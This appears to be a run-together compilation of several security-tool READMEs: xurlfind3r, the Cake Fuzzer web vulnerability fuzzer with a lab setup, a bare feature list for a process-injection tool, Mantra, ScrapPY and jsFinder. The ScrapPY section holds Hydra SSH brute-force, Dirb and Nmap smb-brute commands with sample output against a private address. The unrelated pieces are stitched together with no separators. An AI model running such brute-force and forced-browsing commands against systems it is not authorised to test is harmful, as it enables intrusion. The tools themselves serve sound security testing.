-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots
FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs
OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)
CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)
xurlfind3r -d hackerone.com --include-subdomains# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
Cake Fuzzer is a project that is meant to help automatically and continuously discover vulnerabilities in web applications created based on specific frameworks with very limited false positives. Currently it is implemented to support the Cake PHP framework.
If you would like to learn more about the research process check out this article series: CakePHP Application Cybersecurity Research
Typical approaches to discovering vulnerabilities using automated tools in web applications are:
Both methods have disadvantages. SAST results in a high percentage of false positives – findings that are either not vulnerabilities or not exploitable vulnerabilities. DAST results in fewer false positives but discovers fewer vulnerabilities due to the limited information. It also requires some knowledge about the application and a security background of a person who runs a scan. This often comes with a custom scan configuration per application to work properly.
The Cake Fuzzer project is meant to combine the advantages of both approaches and eliminate the above-mentioned disadvantages. This approach is called Interactive Application Security Testing (IAST).
The goals of the project are:
Note: Some classes of vulnerabilities are not the target of the Cake Fuzzer, therefore Cake Fuzzer will not be able to detect them. Examples of those classes are business logic vulnerabilities and access control issues.
Drawio: Cake Fuzzer Architecture
Cake Fuzzer consists of 3 main (fairly independent) servers that in total allow for dynamic vulnerability testing of CakePHP allications.
Other components include:
Cake Fuzzer is based on the concept of Interactive Application Security Testing (IAST). It contains a predefined set of attacks that are randomly modified before the execution. Cake Fuzzer has the knowledge of the application internals thanks to the Cake PHP framework therefore the attacks will be launched on all possible entry points of the application.
During the attack, the Cake Fuzzer monitors various aspects of the application and the underlying system such as:
These sources of information allow Cake Fuzzer to identify more vulnerabilities and report them with higher certainty.
The following section describes steps to setup a Cake Fuzzer development environment where the target is outdated MISP v2.4.146 that is vulnerable to CVE-2021-41326.
Run the following commands on your host operating system to download an outdated MISP VM:
cd ~/Downloads # Or wherever you want to store the MISP VM
wget https://vm.misp-project.org/MISP_v2.4.146@0c25b72/MISP_v2.4.146@0c25b72-VMware.zip -O MISP.zip
unzip MISP.zip
rm MISP.zip
mv VMware/ MISP-2.4.146Conduct the following actions in VMWare GUI to prepare sharing Cake Fuzzer files between your host OS and MISP:
Run the following commands on your host OS (replace MISP_IP_ADDRESS with previously noted IP address):
ssh-copy-id misp@MISP_IP_ADDRESS
ssh misp@MISP_IP_ADDRESSOnce you SSH into the MISP run the following commands (in MISP terminal) to finish setup of sharing Cake Fuzzer files between host OS and MISP:
sudo apt update
sudo apt-get -y install open-vm-tools open-vm-tools-desktop
sudo apt-get -y install build-essential module-assistant linux-headers-virtual linux-image-virtual && sudo dpkg-reconfigure open-vm-tools
sudo mkdir /cake_fuzzer # Note: This path is fixed as it's hardcoded in the instrumentation (one of the patches)
sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000
ls -l /cake_fuzzer # If everything went fine you should see content of the Cake Fuzzer directory from your host OS. Any changes on your host OS will be reflected inside the VM and vice-versa.Prepare MISP for simple testing (in MISP terminal):
CAKE=/var/www/MISP/app/Console/cake
SUDO='sudo -H -u www-data'
$CAKE userInit -q
$SUDO $CAKE Admin setSetting "Security.password_policy_length" 1
$SUDO $CAKE Admin setSetting "Security.password_policy_complexity" '/.*/'
$SUDO $CAKE Password admin@admin.test admin --override_password_changeFinally instal Cake Fuzzer dependencies and prepare the venv (in MISP terminal):
source /cake_fuzzer/precheck.shCake Fuzzer scans for vulnerabilities that inside of /cake_fuzzer/strategies folder.
To add a new attack we need to add a new new-attack.json file to strategies folder. Each vulnerability contains 2 major fileds:Scenarios and Scanners. Scenarios where attack payloads base forms stored. Scanners in the other hand detecting regex or pharases for response, stout, sterr, logs, and results.
Scenarios
To create a payload first you need to have the understanding of the vulnerability and how to detect it with as few payloads as possible.
While constructing the scenario you should think of as most generic payload as possible. However, the more generic payload, the more chances are that it will produce false-positives.
It is preferable to us a canary value such as__cakefuzzer__new-attack_§CAKEFUZZER_PAYLOAD_GUID§__ in your scenarios. Canary value contains a fixed string (for example: __cakefuzzer__new-attack_) and a dynamic identifier that will be changed dynamically by the fuzzer (GUID part §CAKEFUZZER_PAYLOAD_GUID§). First canary part is used to ensure that payload is detected by Scanners. Second canary part, the GUID is translated to pseudo-random value on every execution of your payload. So whenever your payload will be injected into the a parameter used by the application, the canary will be changed to something like this: __cakefuzzer__new-attack_8383938__, where the 8383938 is unique across all other attacks.
Scanners
To create a scanner, first you need to understand how may the application behave when the vulnerability is triggered. There are few scanner types that you can use such as response, sterr, logs, files, and processes. Each scanner serves a different purpose.
For example when you building a scanner for an XSS, you will look for the indication of the vulnerability in the HTML response of the application. You can use ResultOutputScanner scanner to look for canary value and payload. In other hand SQL Injection vulnerabilities could be detected via error logs. For that purpose you can use LogFilesContentsScanner and ResultErrorsScanner.
Scanner regular expressions is generating an efficent regex. Avoid using regex that match all cases .* or .+. They are very time consuming and drasticly increase the time required to finish the entire scan.As mentioned before efficiency is important part of the vulnerabilities. Both Scenarios and Scanners should include as few elements as possible. This is because Cake Fuzzer executes every single scenario in all possible detected paths multiple times. On the other hand, all responses, new log entries, etc. are constantly checked by the Scanners. There should be a lot of parameters, paths, and end-points detected and therefore using more payload or Scanner affects the efficiency quite a lot.
If do not want to scan a specific vulnerability class, remove specified json file from the strategies folder, clean the database and run the fuzzer again.
For example if you do not want to scan your applicaiton for SQL Injection vulnerabilities, do the following steps:
First of all remove already prepared attack scenarios. To achive this delete all files inside of the /cake_fuzzer/databases folder:
rm /cake_fuzzer/databases/*
After that remove the sqlinj.json file from the /cake_fuzzer/strategies
rm /cake_fuzzer/strategies/sqlinj.json
Finally re-run the fuzzer and all cake_fuzzer running proccess without any SQL Injection attack executed.
git clone https://github.com/Zigrin-Security/CakeFuzzer /cake_fuzzer
Warning Cake Fuzzer won't work properly if it's under different path than /cake_fuzzer. Keep in mind that it has to be placed under the root directory of the file system, next/root,/tmp, and so on.
cd /cake_fuzzerEnter virtual environment if you are not already in:
source /cake_fuzzer/precheck.shOR
source venv/bin/activatecp config/config.example.ini config/config.iniConfigure config/config.ini:
WEBROOT_DIR="/var/www/html" # Path to the tested applications `webroot` directory
CONCURRENT_QUEUES=5 # [Optional] Number of attacks executed concurretnly at once
ONLY_PATHS_WITH_PREFIX="/" # [Optional] Fuzzer will generates only attacks for attacks starting with this prefix
EXCLUDE_PATHS="" # [Optional] Fuzzer will exlude from scanning all paths that match this regular expression. If it's empty, all paths will be processed
PAYLOAD_GUID_PHRASE="§CAKEFUZZER_PAYLOAD_GUID§" # [Optional] Internal keyword that is substituted right before attack with unique payload id
INSTRUMENTATION_INI="config/instrumentation_cake4.ini" # [Optional] Path to custom instrumentations of the application.
Warning During the Cake Fuzzer scan, multiple functionalities of your application will be invoked in uncontrolled manner multiple times. This may result issuing connections to external services your application is connected to, and pulling or pushing data from/to it. It is highly recommended to run Cake Fuzzer in isolated controlled environment without access to sensitive external services.
Note Cake Fuzzer bypass blackholing, CSRF protections, and authorization. It sends all attacks with privileges of a first user in the database. It is recommended that this user has the highest permissions.
The application consists of several components.
Warning All cake_fuzzer commands have to be executed as root.
Before starting the fuzzer make sure your target application is fully instrumented:
python cake_fuzzer.py instrument checkIf there are some unapplied changes apply them with:
python cake_fuzzer.py instrument applyTo run cake fuzzer do the following (It's recommended to use at least 3 separate terminal):
# First Terminal
python cake_fuzzer.py run fuzzer # Generates attacks, adds them to the QUEUE and registers new SCANNERS (then exits)
python cake_fuzzer.py run periodic_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)
# Second terminal
python cake_fuzzer.py run iteration_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)
# Third terminal
python cake_fuzzer.py run attack_queue # Starts the ATTACK QUEUE (use CTRL+C to stop & exit at the end of the scan)
# Once all attacks are executed
python cake_fuzzer.py run registry # Generates `results.json` based on found vulnerabilitiesNote: There is currently a bug that can change the owner of logs (or any other dynamically changed filies of the target web app). This may cause errors when normally using the web application or even false-negatives on future Cake Fuzzer executions. For MISP we recommend running the following after every execution of the fuzzer:
sudo chown -R www-data:www-data /var/www/MISP/app/tmp/logs/Once your scan finishes revert the instrumentation:
python cake_fuzzer.py instrument revertTo run cake fuzzer again, do the following:
Delete Applications Logs (as an example to this, MISP logs stored /var/www/MISP/app/tmp/logs)
rm /var/www/MISP/app/tmp/logs/*
Delete All Files Inside of /cake_fuzzer/databases folder
rm /cake_fuzzer/databases/*
Delete cake_fuzzer/results.jsonfile (Firstly do not forget to save or examine previous scan resulst)
rm /cake_fuzzer/results.json
Finally follow previous running proccess again with 3 terminals
Attack queue marks executed attacks in the database as 'executed' so to run whole suite again you need to remove the database and add attacks again.
Make sure to kill monitors and attack queues before removing the database.
rm database.db*
python cake_fuzzer.py run fuzzer
python cake_fuzzer.py run attack_queue
This is likely due to the fact that the previous log files were overwritten by root. Cake Fuzzer operates as root so new log files will be created with the root as the owner. Remove them:
chmod -R a+w /var/www/MISP/app/tmp/logs/*
If you use VM with sharing cake fuzzer with your host machine, make sure that the host directory is properly attached to the guest VM:
sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000
Cake Fuzzer has to be located under the root directory of the machine and the base directory name should be cake_fuzzer specificaly.
mv CakeFuzzer/ /cake_fuzzerinstrument apply
Instrumentation proccess is a part of Cake Fuzzer execution flow. When you run instrument apply followed by instrument check, both of these commands should result in the same number of changes.
If you get any "patch" error you could apply patches manually and delete problematic patch file. Patches are located under the /cake_fuzzer/cakefuzzer/instrumentation/pathces directory.
While installing or running if you have python dependency error, manuallay install dependencies after switching to virtual environment.
First switch to the virtual environment
source venv/bin/activateAfter that you can install dependecies with pip3.
pip3 install -r requriments.txtThis project was inspired by:
This project was commissioned by: 
Process interaction
Process Memory
Process modules
Threads
Pattern search
Remote code execution
Remote hooking
Manual map features
Driver features
The tool in question was created in Go and its main objective is to search for API keys in JavaScript files and HTML pages.
It works by checking the source code of web pages and script files for strings that are identical or similar to API keys. These keys are often used for authentication to online services such as third-party APIs and are confidential and should not be shared publicly.
By using this tool, developers can quickly identify if their API keys are leaking and take steps to fix the problem before they are compromised. Furthermore, the tool can be useful for security officers, who can use it to verify that applications and websites that use external APIs are adequately protecting their keys.
In summary, this tool is an efficient and accurate solution to help secure your API keys and prevent sensitive information leaks.
git clone https://github.com/MrEmpy/Mantra
cd Mantra
make
./build/mantra-amd64-linux -h
ScrapPY is a Python utility for scraping manuals, documents, and other sensitive PDFs to generate targeted wordlists that can be utilized by offensive security tools to perform brute force, forced browsing, and dictionary attacks. ScrapPY performs word frequency, entropy, and metadata analysis, and can run in full output modes to craft custom wordlists for targeted attacks. The tool dives deep to discover keywords and phrases leading to potential passwords or hidden directories, outputting to a text file that is readable by tools such as Hydra, Dirb, and Nmap. Expedite initial access, vulnerability discovery, and lateral movement with ScrapPY!
Download Repository:
$ mkdir ScrapPY
$ cd ScrapPY/
$ sudo git clone https://github.com/RoseSecurity/ScrapPY.git
Install Dependencies:
$ pip3 install -r requirements.txt
usage: ScrapPY.py [-h] [-f FILE] [-m {word-frequency,full,metadata,entropy}] [-o OUTPUT]
Output metadata of document:
$ python3 ScrapPY.py -f example.pdf -m metadata
Output top 100 frequently used keywords to a file name Top_100_Keywords.txt:
$ python3 ScrapPY.py -f example.pdf -m word-frequency -o Top_100_Keywords.txt
Output all keywords to default ScrapPY.txt file:
$ python3 ScrapPY.py -f example.pdf
Output top 100 keywords with highest entropy rating:
$ python3 ScrapPY.py -f example.pdf -m entropy
ScrapPY Output:
# ScrapPY outputs the ScrapPY.txt file or specified name file to the directory in which the tool was ran. To view the first fifty lines of the file, run this command:
$ head -50 ScrapPY.txt
# To see how many words were generated, run this command:
$ wc -l ScrapPY.txt
Easily integrate with tools such as Dirb to expedite the process of discovering hidden subdirectories:
root@RoseSecurity:~# dirb http://192.168.1.123/ /root/ScrapPY/ScrapPY.txt
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Fri May 16 13:41:45 2014
URL_BASE: http://192.168.1.123/
WORDLIST_FILES: /root/ScrapPY/ScrapPY.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.1.123/ ----
==> DIRECTORY: http://192.168.1.123/vi/
+ http://192.168.1.123/programming (CODE:200|SIZE:2726)
+ http://192.168.1.123/s7-logic/ (CODE:403|SIZE:1122)
==> DIRECTORY: http://192.168.1.123/config/
==> DIRECTORY: http://192.168.1.123/docs/
==> DIRECTORY: http://192.168.1.123/external/
Utilize ScrapPY with Hydra for advanced brute force attacks:
root@RoseSecurity:~# hydra -l root -P /root/ScrapPY/ScrapPY.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22
Enhance Nmap scripts with ScrapPY wordlists:
nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=ScrapPY.txt 192.168.1.123
jsFinder is a command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.
jsFinder is useful for web developers and security professionals who want to find and analyze the JavaScript files used by a web application. By analyzing the JavaScript files, it's possible to understand the functionality of the application and detect any security vulnerabilities or sensitive information leakage.
jsfinder requires Go 1.20 to install successfully.Run the following command to get the repo :
go install -v github.com/kacakb/jsfinder@latestTo see which flags you can use with the tool, use the -h flag.
jsfinder -h | Flag | Description |
|---|---|
| -l | Specifies the filename to read URLs from. |
| -c | Specifies the maximum number of concurrent requests to be made. The default value is 20. |
| -s | Runs the program in silent mode. If this flag is not set, the program runs in verbose mode. |
| -o | Specifies the filename to write found URLs to. The default filename is output.txt. |
| -read | Reads URLs from stdin instead of a file specified by the -l flag. |
If you want to read from stdin and run the program in silent mode, use this command:
cat list.txt| jsfinder -read -s -o js.txt
If you want to read from a file, you should specify it with the -l flag and use this command:
jsfinder -l list.txt -s -o js.txtYou can also specify the concurrency with the -c flag.The default value is 20. If you want to read from a file, you should specify it with the -l flag and use this command:
jsfinder -l list.txt -c 50 -s -o js.txtIf you have any questions, feedback or collaboration suggestions related to this project, please feel free to contact me via:
e-mail
